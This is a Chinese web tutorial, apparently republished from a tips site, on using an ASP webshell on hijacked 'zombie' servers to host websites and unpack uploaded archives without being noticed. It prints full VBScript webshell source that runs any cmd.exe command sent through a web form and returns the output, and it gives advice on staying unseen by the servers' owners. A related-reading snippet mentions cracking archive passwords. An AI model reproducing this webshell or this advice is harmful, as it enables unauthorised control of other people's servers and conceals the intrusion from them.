用ASP木马实现FTP和解压缩

2016-02-19 17:09 14 1 收藏

下面是个用ASP木马实现FTP和解压缩教程,撑握了其技术要点,学起来就简单多了。赶紧跟着图老师小编一起来看看吧!

【 tulaoshi.com - Web开发 】

  我想大家都有一些开了80端口的肉鸡吧,如果是国内的出于安全就不要往下看了,如果不不妨往下看一下,小弟献丑了,以求抛砖引玉.

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/webkaifa/)

  在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和asp木马可以轻松实现.

  asp木马大家都很熟悉,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序.我选择了化境的webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继续)和一个asp木马(如果,实在懒得找.最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过如果有很多文件一个一个上传可就麻烦了,怎么办?这下asp木马用上了.找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,如果是别的命令行的解压缩工具也可以喔)把它拷到%SystemRoot%system32下.上传.zip或者.rar文件到该肉鸡的web目录.在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,V,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟目录成绝对路径并输出的语句<% =server.mappath(".") %>,"."可以随意改成任何的相对虚拟目录.

  只是提供一个思路,如果哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,如果真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压,不知会不会弹出对话框。

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/webkaifa/)

  --------以下是asp木马的源码,建议在<html>后加上<% =server.mappath(".") %>------------------------------

  

<%@ Language=VBScript %><% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFileOn Error Resume Next <' -- create the COM objects that we will be using -- '  Set oScript = Server.createObject("WSCRIPT.SHELL")  Set oScriptNet = Server.createObject("WSCRIPT.NETWORK")  Set oFileSys = Server.createObject("Scripting.FileSystemObject") <' -- check for a command that we have posted -- '  szCMD = Request.form(".CMD")  If (szCMD <> "") Then <' -- Use a poor man's pipe ... a temp file -- '   szTempFile = "C:" & oFileSys.GetTempName( )   Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)   Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) <End If <%><HTML><BODY> <form action="<%= Request.ServerVariables("URL") %>" method="POST">  <input type=text name=".CMD" size=45 value="<%= szCMD %>">  <input type=submit value="Run"> </form><PRE><<%  If (IsObject(oFile)) Then   ' -- Read the output from our command and remove the temp file -- '   On Error Resume Next   Response.Write Server.HTMLEncode(oFile.ReadAll)   oFile.Close   Call oFileSys.deleteFile(szTempFile, True)  End If %></BODY></HTML>>

来源:http://www.tulaoshi.com/n/20160219/1614368.html

延伸阅读
标签: 压缩包
下载/打开ARPR 首先我们需要下载ARPR,然后打开它,如下图。 必须知道密码 看看要破解密码的压缩包,如图:我们看到,要解压成功必须知道密码才行。 打开需解压的文件 我们来打开所需要解压的文件,如图:按红色方框的按扭,选择所需解压的文件。 选中并打开该文件 如图:选中所需解压的文件。 选择暴破范围选项 如图...
winrar解压缩软件使用教程 压缩(打包) 选中要压缩的文件夹(或文件)单击右键,选择添加到压缩文件,(创建自解压格式) 解压缩(解包) 选中要解压的文件夹,单击右键,选择解压缩到XXXX 安装winrar 1、打开百度里,搜索winrar 2、在搜索出来的软件下面列表中,选择一个下载的网站,比如华...
如何用CZip/CUnzip类压缩/解压缩文件 作者:hangwire Zip/Unzip dll源代码下载 范例程序下载 本文介绍如何用CZip/CUnzip类压缩/解压缩文件,这个类使用gzip GNU源代码(gzip-1.2.4a)。这是个免费软件,在GUN通用公共许可证(General Public License)条款下可以分发及修改此软件,关于这...
标签: 密码 电脑
下载文件 随便打开一个浏览器,在输入框中输入要下载文件的名称即可。 右击属性 首先,我们选择rar压缩文件点属性,如图。 查看密码 点属性-选择注释-看密码就在这,一般网站下载的软件解压密码都在这,如图。 点击确定 把这密码复制到解压密码框里,点确认即可,如图。 在网站软件下寻找 如果前...
压缩饼干是很多人都喜爱吃的食物,尤其是这样的食物吃起来可口,而且含有的营养元素也是比较丰富,那对这样食物选择上,也是要注意不能随意的乱吃,它一般都是出门在外的时候吃最佳,使得能够很好的补充人体体力,过多的吃,也是会造成人体负担,那压缩饼干一次吃多少呢? 对压缩饼干一次吃多少呢,也是很多人不太清楚的,因此对它选...

经验教程

876

收藏

49
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部